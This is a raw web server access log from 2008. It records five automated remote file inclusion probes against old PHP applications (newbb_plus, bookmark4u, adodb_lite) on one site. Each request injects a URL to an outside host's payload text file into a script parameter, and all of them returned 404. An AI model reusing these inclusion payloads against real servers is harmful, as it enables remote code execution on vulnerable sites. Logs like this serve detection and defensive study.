208.69.231.178 - - [26/Oct/2008:09:34:29 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
211.115.110.116 - - [26/Oct/2008:09:34:30 -0700] "GET /logs/access_080621.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:34:33 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:34:34 -0700] "GET /logs/access_080905.log//lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.253.128.88 - - [26/Oct/2008:09:34:34 -0700] "GET /lib/adodb_lite/adodb/rock.ge/images/V7ID.txt???/errors.php?error=http://aa-acu.com/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
